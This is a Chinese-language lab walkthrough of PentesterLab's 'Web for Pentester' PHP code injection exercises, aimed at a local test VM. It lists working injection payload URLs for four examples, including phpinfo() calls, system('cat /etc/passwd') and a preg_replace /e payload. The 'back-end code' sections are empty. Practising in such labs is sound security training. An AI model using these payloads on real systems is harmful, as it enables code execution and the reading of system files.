本文主要是根据官网和网上的教程进行实战,详细讲解请参照
1、https://pentesterlab.com/exercises/web_for_pentester/course
2、http://www.freebuf.com/sectool/168653.html
关于代码注入的相关知识:代码注入的原理,检测,利用,下次在补充。
一、example1
1、判断是否存在注入,在url后输入双引号:”
报错,说明”破坏了内部结构。
后台代码:
2、payload:http://192.168.152.131/codeexec/example1.php?name=hacker%22.phpinfo();//
还可以将phpinfo 换成system(‘ls’)/system(‘cat /etc/passwd’)
二、example2
1、后台代码
2、payload:http://192.168.152.131/codeexec/example2.php?order=id);}system(%27cat%20/etc/passwd%27);//
注意:单引号不能省
三、example3
1、后台代码:
2、payload:http://192.168.152.131/codeexec/example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
四、example4
1、后台代码:
2、payload:http://192.168.152.131/codeexec/example4.php?name=hacker%27.phpinfo().%27
Web for PentesterI 代码注入-实战篇
最新推荐文章于 2023-02-06 20:06:21 发布